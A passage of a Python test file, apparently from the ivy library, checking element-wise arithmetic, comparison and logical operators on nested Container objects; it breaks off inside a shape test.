        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_scalar_addition(device, call):
    """In-place ``+= scalar`` adds the scalar to every leaf."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont += 3
    # verify each leaf via item access and attribute access
    for key_chain, want in (("a", [4]), ("b/c", [5]), ("b/d", [6])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_reverse_scalar_addition(device, call):
    """``scalar + Container`` adds the scalar to every leaf."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = 3 + cont
    # verify each leaf via item access and attribute access
    for key_chain, want in (("a", [4]), ("b/c", [5]), ("b/d", [6])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_addition(device, call):
    """``Container + Container`` adds corresponding leaves element-wise."""
    lhs = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([4], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    total = lhs + rhs
    # verify each summed leaf via item access and attribute access
    for key_chain, want in (("a", [3]), ("b/c", [6]), ("b/d", [9])):
        by_item, by_attr = total, total
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_scalar_subtraction(device, call):
    """In-place ``-= scalar`` subtracts the scalar from every leaf."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont -= 1
    # verify each leaf via item access and attribute access
    for key_chain, want in (("a", [0]), ("b/c", [1]), ("b/d", [2])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_reverse_scalar_subtraction(device, call):
    """``scalar - Container`` subtracts every leaf from the scalar."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = 1 - cont
    # 1-1=0, 1-2=-1, 1-3=-2; verify via item and attribute access
    for key_chain, want in (("a", [0]), ("b/c", [-1]), ("b/d", [-2])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_subtraction(device, call):
    """``Container - Container`` subtracts corresponding leaves."""
    lhs = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([4], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([1], device=device),
                "d": ivy.array([4], device=device),
            },
        }
    )
    diff = lhs - rhs
    # 2-1=1, 4-1=3, 6-4=2; verify via item and attribute access
    for key_chain, want in (("a", [1]), ("b/c", [3]), ("b/d", [2])):
        by_item, by_attr = diff, diff
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_scalar_multiplication(device, call):
    """In-place ``*= scalar`` scales every leaf."""
    cont = Container(
        {
            "a": ivy.array([1.0], device=device),
            "b": {
                "c": ivy.array([2.0], device=device),
                "d": ivy.array([3.0], device=device),
            },
        }
    )
    cont *= 2.5
    # verify each leaf via item access and attribute access
    for key_chain, want in (("a", [2.5]), ("b/c", [5.0]), ("b/d", [7.5])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_reverse_scalar_multiplication(device, call):
    """``scalar * Container`` scales every leaf."""
    cont = Container(
        {
            "a": ivy.array([1.0], device=device),
            "b": {
                "c": ivy.array([2.0], device=device),
                "d": ivy.array([3.0], device=device),
            },
        }
    )
    cont = 2.5 * cont
    # verify each leaf via item access and attribute access
    for key_chain, want in (("a", [2.5]), ("b/c", [5.0]), ("b/d", [7.5])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_multiplication(device, call):
    """``Container * Container`` multiplies corresponding leaves."""
    lhs = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([4], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    product = lhs * rhs
    # 1*2=2, 2*4=8, 3*6=18; verify via item and attribute access
    for key_chain, want in (("a", [2]), ("b/c", [8]), ("b/d", [18])):
        by_item, by_attr = product, product
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_scalar_truediv(device, call):
    """In-place ``/= scalar`` divides every leaf by the scalar."""
    cont = Container(
        {
            "a": ivy.array([1.0], device=device),
            "b": {
                "c": ivy.array([5.0], device=device),
                "d": ivy.array([5.0], device=device),
            },
        }
    )
    cont /= 2
    # verify each leaf via item access and attribute access
    for key_chain, want in (("a", [0.5]), ("b/c", [2.5]), ("b/d", [2.5])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_reverse_scalar_truediv(device, call):
    """scalar / container must divide the scalar by every leaf (__rtruediv__)."""
    cont = Container(
        {
            "a": ivy.array([1.0], device=device),
            "b": {
                "c": ivy.array([5.0], device=device),
                "d": ivy.array([5.0], device=device),
            },
        }
    )
    cont = 2 / cont

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], 2.0)
    _expect(cont.a, 2.0)
    _expect(cont["b"]["c"], 0.4)
    _expect(cont.b.c, 0.4)
    _expect(cont["b"]["d"], 0.4)
    _expect(cont.b.d, 0.4)
def test_container_truediv(device, call):
    """Elementwise true division of two containers."""
    numerator = Container(
        {
            "a": ivy.array([1.0], device=device),
            "b": {
                "c": ivy.array([5.0], device=device),
                "d": ivy.array([5.0], device=device),
            },
        }
    )
    denominator = Container(
        {
            "a": ivy.array([2.0], device=device),
            "b": {
                "c": ivy.array([2.0], device=device),
                "d": ivy.array([4.0], device=device),
            },
        }
    )
    quotient = numerator / denominator

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(quotient["a"], 0.5)
    _expect(quotient.a, 0.5)
    _expect(quotient["b"]["c"], 2.5)
    _expect(quotient.b.c, 2.5)
    _expect(quotient["b"]["d"], 1.25)
    _expect(quotient.b.d, 1.25)
def test_container_scalar_floordiv(device, call):
    """In-place floor division of a container by a scalar."""
    if call is helpers.mx_call:
        # MXnet arrays do not overload the // operator, can add if explicit
        # ivy.floordiv is implemented at some point
        pytest.skip()
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    cont //= 2

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], 0)
    _expect(cont.a, 0)
    _expect(cont["b"]["c"], 2)
    _expect(cont.b.c, 2)
    _expect(cont["b"]["d"], 2)
    _expect(cont.b.d, 2)
def test_container_reverse_scalar_floordiv(device, call):
    """scalar // container must floor-divide the scalar by every leaf."""
    if call is helpers.mx_call:
        # MXnet arrays do not overload the // operator, can add if explicit
        # ivy.floordiv is implemented at some point
        pytest.skip()
    cont = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([1], device=device),
                "d": ivy.array([7], device=device),
            },
        }
    )
    cont = 5 // cont

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], 2)
    _expect(cont.a, 2)
    _expect(cont["b"]["c"], 5)
    _expect(cont.b.c, 5)
    _expect(cont["b"]["d"], 0)
    _expect(cont.b.d, 0)
def test_container_floordiv(device, call):
    """Elementwise floor division of two containers."""
    if call is helpers.mx_call:
        # MXnet arrays do not overload the // operator, can add if explicit
        # ivy.floordiv is implemented at some point
        pytest.skip()
    numerator = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    denominator = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([4], device=device),
            },
        }
    )
    quotient = numerator // denominator

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(quotient["a"], 0)
    _expect(quotient.a, 0)
    _expect(quotient["b"]["c"], 2)
    _expect(quotient.b.c, 2)
    _expect(quotient["b"]["d"], 1)
    _expect(quotient.b.d, 1)
def test_container_abs(device, call):
    """abs(container) must take the absolute value of every leaf."""
    cont = abs(
        Container(
            {
                "a": ivy.array([1], device=device),
                "b": {
                    "c": ivy.array([-2], device=device),
                    "d": ivy.array([3], device=device),
                },
            }
        )
    )

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], 1)
    _expect(cont.a, 1)
    _expect(cont["b"]["c"], 2)
    _expect(cont.b.c, 2)
    _expect(cont["b"]["d"], 3)
    _expect(cont.b.d, 3)
def test_container_scalar_less_than(device, call):
    """container < scalar must compare every leaf against the scalar."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = cont < 2

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], True)
    _expect(cont.a, True)
    _expect(cont["b"]["c"], False)
    _expect(cont.b.c, False)
    _expect(cont["b"]["d"], False)
    _expect(cont.b.d, False)
def test_container_reverse_scalar_less_than(device, call):
    """scalar < container must compare the scalar against every leaf."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = 2 < cont

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], False)
    _expect(cont.a, False)
    _expect(cont["b"]["c"], False)
    _expect(cont.b.c, False)
    _expect(cont["b"]["d"], True)
    _expect(cont.b.d, True)
def test_container_less_than(device, call):
    """Elementwise < between two containers."""
    lhs = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    result = lhs < rhs

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(result["a"], True)
    _expect(result.a, True)
    _expect(result["b"]["c"], False)
    _expect(result.b.c, False)
    _expect(result["b"]["d"], False)
    _expect(result.b.d, False)
def test_container_scalar_less_than_or_equal_to(device, call):
    """container <= scalar must compare every leaf against the scalar."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = cont <= 2

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], True)
    _expect(cont.a, True)
    _expect(cont["b"]["c"], True)
    _expect(cont.b.c, True)
    _expect(cont["b"]["d"], False)
    _expect(cont.b.d, False)
def test_container_reverse_scalar_less_than_or_equal_to(device, call):
    """scalar <= container must compare the scalar against every leaf."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = 2 <= cont

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], False)
    _expect(cont.a, False)
    _expect(cont["b"]["c"], True)
    _expect(cont.b.c, True)
    _expect(cont["b"]["d"], True)
    _expect(cont.b.d, True)
def test_container_less_than_or_equal_to(device, call):
    """Elementwise <= between two containers."""
    lhs = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    result = lhs <= rhs

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(result["a"], True)
    _expect(result.a, True)
    _expect(result["b"]["c"], False)
    _expect(result.b.c, False)
    _expect(result["b"]["d"], True)
    _expect(result.b.d, True)
def test_container_scalar_equal_to(device, call):
    """container == scalar must compare every leaf against the scalar."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = cont == 2

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], False)
    _expect(cont.a, False)
    _expect(cont["b"]["c"], True)
    _expect(cont.b.c, True)
    _expect(cont["b"]["d"], False)
    _expect(cont.b.d, False)
def test_container_reverse_scalar_equal_to(device, call):
    """scalar == container must dispatch to the container's reflected __eq__."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = 2 == cont

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], False)
    _expect(cont.a, False)
    _expect(cont["b"]["c"], True)
    _expect(cont.b.c, True)
    _expect(cont["b"]["d"], False)
    _expect(cont.b.d, False)
def test_container_equal_to(device, call):
    """Elementwise == between two containers."""
    lhs = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    result = lhs == rhs

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(result["a"], False)
    _expect(result.a, False)
    _expect(result["b"]["c"], False)
    _expect(result.b.c, False)
    _expect(result["b"]["d"], True)
    _expect(result.b.d, True)
def test_container_scalar_not_equal_to(device, call):
    """container != scalar must compare every leaf against the scalar."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = cont != 2

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], True)
    _expect(cont.a, True)
    _expect(cont["b"]["c"], False)
    _expect(cont.b.c, False)
    _expect(cont["b"]["d"], True)
    _expect(cont.b.d, True)
def test_container_reverse_scalar_not_equal_to(device, call):
    """scalar != container must dispatch to the container's reflected __ne__."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = 2 != cont

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], True)
    _expect(cont.a, True)
    _expect(cont["b"]["c"], False)
    _expect(cont.b.c, False)
    _expect(cont["b"]["d"], True)
    _expect(cont.b.d, True)
def test_container_not_equal_to(device, call):
    """Elementwise != between two containers."""
    lhs = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    result = lhs != rhs

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(result["a"], True)
    _expect(result.a, True)
    _expect(result["b"]["c"], True)
    _expect(result.b.c, True)
    _expect(result["b"]["d"], False)
    _expect(result.b.d, False)
def test_container_scalar_greater_than(device, call):
    """container > scalar must compare every leaf against the scalar."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = cont > 2

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], False)
    _expect(cont.a, False)
    _expect(cont["b"]["c"], False)
    _expect(cont.b.c, False)
    _expect(cont["b"]["d"], True)
    _expect(cont.b.d, True)
def test_container_reverse_scalar_greater_than(device, call):
    """scalar > container must compare the scalar against every leaf."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = 2 > cont

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], True)
    _expect(cont.a, True)
    _expect(cont["b"]["c"], False)
    _expect(cont.b.c, False)
    _expect(cont["b"]["d"], False)
    _expect(cont.b.d, False)
def test_container_greater_than(device, call):
    """Elementwise > between two containers."""
    lhs = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    result = lhs > rhs

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(result["a"], False)
    _expect(result.a, False)
    _expect(result["b"]["c"], True)
    _expect(result.b.c, True)
    _expect(result["b"]["d"], False)
    _expect(result.b.d, False)
def test_container_scalar_greater_than_or_equal_to(device, call):
    """container >= scalar must compare every leaf against the scalar."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = cont >= 2

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], False)
    _expect(cont.a, False)
    _expect(cont["b"]["c"], True)
    _expect(cont.b.c, True)
    _expect(cont["b"]["d"], True)
    _expect(cont.b.d, True)
def test_container_reverse_scalar_greater_than_or_equal_to(device, call):
    """scalar >= container must compare the scalar against every leaf."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = 2 >= cont

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], True)
    _expect(cont.a, True)
    _expect(cont["b"]["c"], True)
    _expect(cont.b.c, True)
    _expect(cont["b"]["d"], False)
    _expect(cont.b.d, False)
def test_container_greater_than_or_equal_to(device, call):
    """Elementwise >= between two containers."""
    lhs = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    result = lhs >= rhs

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(result["a"], False)
    _expect(result.a, False)
    _expect(result["b"]["c"], True)
    _expect(result.b.c, True)
    _expect(result["b"]["d"], True)
    _expect(result.b.d, True)
def test_container_scalar_and(device, call):
    """container & scalar must apply logical-and to every leaf."""
    cont = Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    # ToDo: work out why "container and True" does not work. Perhaps bool(container)
    # is called first implicitly?
    cont = cont & True

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], True)
    _expect(cont.a, True)
    _expect(cont["b"]["c"], True)
    _expect(cont.b.c, True)
    _expect(cont["b"]["d"], False)
    _expect(cont.b.d, False)
def test_container_reverse_scalar_and(device, call):
    """scalar & container must apply logical-and to every leaf (__rand__).

    Fixed: the previous `True and container` short-circuits at the Python
    level (keywords `and`/`or` cannot be overloaded) and simply returns the
    container untouched, so no operator was actually exercised.  The bitwise
    form `&` is used instead, matching test_container_scalar_and.
    """
    container = Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    container = True & container
    assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
    assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
    assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
    assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
    assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
    assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_and(device, call):
    """Elementwise logical-and between two containers.

    Fixed: `container_a and container_b` short-circuits at the Python level
    (a truthy lhs makes `and` return the rhs unchanged), so the original
    test merely asserted container_b's own values.  The overloadable bitwise
    `&` operator is used instead; the expected values below are the true
    elementwise AND of the two containers.
    """
    container_a = Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    container_b = Container(
        {
            "a": ivy.array([False], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    container = container_a & container_b
    assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
    assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
    assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
    assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
    assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
    assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_or(device, call):
    """container | scalar must apply logical-or to every leaf.

    Fixed: `container or False` short-circuits at the Python level (a truthy
    container makes `or` return it unchanged), so no operator was exercised.
    The overloadable bitwise `|` form is used instead.
    """
    container = Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    container = container | False
    assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
    assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
    assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
    assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
    assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
    assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_or(device, call):
    """scalar | container must apply logical-or to every leaf (__ror__).

    Fixed two defects: the original body was a copy-paste of the forward
    test (`container or False` — not reversed at all), and Python's `or`
    keyword short-circuits so it never exercises an operator overload.
    The reversed bitwise form `False | container` is used instead.
    """
    container = Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    container = False | container
    assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
    assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
    assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
    assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
    assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
    assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_or(device, call):
    """Elementwise logical-or between two containers.

    Fixed: `container_a or container_b` short-circuits at the Python level
    (a truthy lhs makes `or` return it unchanged), so the original test
    merely asserted container_a's own values.  The overloadable bitwise `|`
    operator is used instead; the expected values below are the true
    elementwise OR of the two containers.
    """
    container_a = Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    container_b = Container(
        {
            "a": ivy.array([False], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    container = container_a | container_b
    assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
    assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
    assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
    assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
    assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
    assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_not(device, call):
    """~container must logically invert every leaf."""
    cont = ~Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], False)
    _expect(cont.a, False)
    _expect(cont["b"]["c"], False)
    _expect(cont.b.c, False)
    _expect(cont["b"]["d"], True)
    _expect(cont.b.d, True)
def test_container_scalar_xor(device, call):
    """container xor scalar, expressed via != (equivalent to xor on bools)."""
    if call is helpers.mx_call:
        # MXnet arrays do not overload the ^ operator, can add if explicit
        # ivy.logical_xor is implemented at some point
        pytest.skip()
    cont = Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    cont = cont != True  # noqa

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], False)
    _expect(cont.a, False)
    _expect(cont["b"]["c"], False)
    _expect(cont.b.c, False)
    _expect(cont["b"]["d"], True)
    _expect(cont.b.d, True)
def test_container_reverse_scalar_xor(device, call):
    """scalar xor container, expressed via != (equivalent to xor on bools)."""
    if call is helpers.mx_call:
        # MXnet arrays do not overload the ^ operator, can add if explicit
        # ivy.logical_xor is implemented at some point
        pytest.skip()
    cont = Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    cont = False != cont  # noqa

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(cont["a"], True)
    _expect(cont.a, True)
    _expect(cont["b"]["c"], True)
    _expect(cont.b.c, True)
    _expect(cont["b"]["d"], False)
    _expect(cont.b.d, False)
def test_container_xor(device, call):
    """Elementwise xor between two containers, expressed via != on bools."""
    if call is helpers.mx_call:
        # MXnet arrays do not overload the ^ operator, can add if explicit
        # ivy.logical_xor is implemented at some point
        pytest.skip()
    lhs = Container(
        {
            "a": ivy.array([True], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    rhs = Container(
        {
            "a": ivy.array([False], device=device),
            "b": {
                "c": ivy.array([True], device=device),
                "d": ivy.array([False], device=device),
            },
        }
    )
    result = lhs != rhs  # noqa

    def _expect(leaf, value):
        assert np.allclose(ivy.to_numpy(leaf), np.array([value]))

    _expect(result["a"], True)
    _expect(result.a, True)
    _expect(result["b"]["c"], False)
    _expect(result.b.c, False)
    _expect(result["b"]["d"], False)
    _expect(result.b.d, False)
def test_container_shape(device, call):
    """Container.shape is the consensus of leaf shapes, None where they differ."""
    cases = [
        # (leaves, expected consensus shape)
        (
            {
                "a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
                "b": {
                    "c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
                    "d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
                },
            },
            [1, 3, 1],
        ),
        (
            {
                "a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
                "b": {
